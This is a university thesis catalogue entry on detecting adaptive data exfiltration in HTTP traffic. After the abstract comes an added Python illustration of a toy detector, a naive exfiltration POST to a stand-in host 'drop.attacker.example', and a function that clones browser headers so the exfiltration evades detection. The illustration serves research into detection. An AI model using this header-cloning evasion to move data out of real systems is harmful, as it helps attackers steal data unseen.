University of Twente Student Theses
Detecting adaptive data exfiltration in HTTP traffic
Ede, Thijs S. van (2017) Detecting adaptive data exfiltration in HTTP traffic.
Abstract: Our work introduces a new type of attack which adapts the network communication of an adversary such that it mimics communication of the applications active on an infected host. By doing so, the adversary aims to remain undetected by fully blending in with benign traffic. We demonstrate this novel attack through several case studies in which we created multiple variants of data exfiltrating malware, which adapt their communication to mimic the HTTP traffic of the browser application of the infected host. In addition, we introduce novel heuristics to detect adaptive data exfiltration and combine them in our Adaptive Browser-Imitating Data Exfiltration Detector (ABIDED). We compare our solution to DECANTeR and DUMONT, two state-of-the-art detection mechanisms which detect covert communication over HTTP. Our analysis shows that ABIDED's performance is comparable to existing solutions in detecting existing exfiltrating communication. However, it greatly improves detection of adaptive exfiltration with a detection rate of 93.3% against 5.2% for DECANTeR and 23.2% for DUMONT. Moreover, our analysis shows that the false positive rate of ABIDED is significantly lower than that of the other systems, making it a powerful solution for detecting data exfiltration.
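The following is an added, constructed illustration of the attack the abstract describes; it is not code from the thesis and does not reproduce the logic of ABIDED, DECANTeR or DUMONT. It builds a deliberately simple detector that learns the host browser's request profile (HTTP method, header-name order, User-Agent and Accept-Language) from benign traffic, then shows that a naive exfiltration request with library-default headers is flagged while an adaptive variant that clones the browser's own POST profile is not. All hostnames, header values, the exfiltrated payload and the profile fields are assumptions chosen for the example.

```python
# Constructed example (not the thesis's code, nor ABIDED/DECANTeR/DUMONT):
# a simplified request-profile detector versus naive and adaptive exfiltration.
from dataclasses import dataclass, field
from typing import Dict, FrozenSet, List, Tuple

Header = Tuple[str, str]


@dataclass
class Request:
    method: str
    host: str
    headers: List[Header]          # kept in wire order; order is part of the profile
    body: str = ""


# Assumed browser on the infected host (values chosen for the example).
FIREFOX_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"


def firefox_get(host: str, accept: str = "text/html,*/*;q=0.8") -> Request:
    return Request("GET", host, [
        ("Host", host),
        ("User-Agent", FIREFOX_UA),
        ("Accept", accept),
        ("Accept-Language", "en-US,en;q=0.5"),
        ("Accept-Encoding", "gzip, deflate"),
        ("Connection", "keep-alive"),
    ])


def firefox_post(host: str, body: str) -> Request:
    return Request("POST", host, [
        ("Host", host),
        ("User-Agent", FIREFOX_UA),
        ("Accept", "text/html,*/*;q=0.8"),
        ("Accept-Language", "en-US,en;q=0.5"),
        ("Accept-Encoding", "gzip, deflate"),
        ("Content-Type", "application/x-www-form-urlencoded"),
        ("Content-Length", str(len(body))),
        ("Connection", "keep-alive"),
    ], body)


# Constructed benign training traffic: what the host's browser normally sends.
BENIGN_TRAFFIC: List[Request] = [
    firefox_get("www.example.com"),
    firefox_get("cdn.example.net", "image/png,*/*;q=0.5"),
    firefox_post("login.example.com", "user=alice&pw=hunter2"),
]

Fingerprint = Tuple[str, Tuple[str, ...], str, str]


def fingerprint(req: Request) -> Fingerprint:
    """Method, header-name order, and the stable User-Agent / Accept-Language values.
    Volatile fields (Host, Accept, Content-Length, body) are deliberately excluded,
    which is exactly the gap an adaptive attacker exploits."""
    hmap = {k.lower(): v for k, v in req.headers}
    return (
        req.method,
        tuple(k.lower() for k, _ in req.headers),
        hmap.get("user-agent", ""),
        hmap.get("accept-language", ""),
    )


def train(reqs: List[Request]) -> FrozenSet[Fingerprint]:
    return frozenset(fingerprint(r) for r in reqs)


def is_anomalous(profile: FrozenSet[Fingerprint], req: Request) -> bool:
    """Flag any request whose fingerprint never appeared in benign traffic."""
    return fingerprint(req) not in profile


# Constructed payload and attacker host (assumptions).
SECRET = "id=4711&doc=Q3-forecast.xlsx&data=UEsDBBQAAAAIA..."
DROP_HOST = "drop.attacker.example"

# Variant 1: naive exfiltration using an HTTP library's default headers.
naive_exfil = Request("POST", DROP_HOST, [
    ("Host", DROP_HOST),
    ("User-Agent", "python-requests/2.18.4"),
    ("Accept-Encoding", "gzip, deflate"),
    ("Accept", "*/*"),
    ("Connection", "keep-alive"),
    ("Content-Length", str(len(SECRET))),
], SECRET)


def adapt_to_browser(observed: Request, host: str, body: str) -> Request:
    """Variant 2: clone a request the host's browser actually sent, changing only
    the destination and the body, so order and stable header values match."""
    cloned: List[Header] = []
    for name, value in observed.headers:
        if name == "Host":
            value = host
        elif name == "Content-Length":
            value = str(len(body))
        cloned.append((name, value))
    return Request(observed.method, host, cloned, body)


adaptive_exfil = adapt_to_browser(BENIGN_TRAFFIC[2], DROP_HOST, SECRET)


def run_demo() -> Dict[str, bool]:
    profile = train(BENIGN_TRAFFIC)
    return {
        "naive_flagged": is_anomalous(profile, naive_exfil),
        "adaptive_flagged": is_anomalous(profile, adaptive_exfil),
    }


if __name__ == "__main__":
    print(run_demo())  # {'naive_flagged': True, 'adaptive_flagged': False}
```

The point of the example is the second result: once the malware observes and copies the host browser's own request profile, a detector keyed on static request characteristics has nothing left to distinguish the exfiltration from a normal form submission, which is why the abstract reports that detection of the adaptive variants drops sharply for approaches not designed for it and motivates heuristics that look beyond a single request's header profile.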
Item Type: Essay (Master)
Faculty: EEMCS: Electrical Engineering, Mathematics and Computer Science
Subject: 54 computer science
Programme: Computer Science MSc (60300)
Link to this item: https://purl.utwente.nl/essays/74268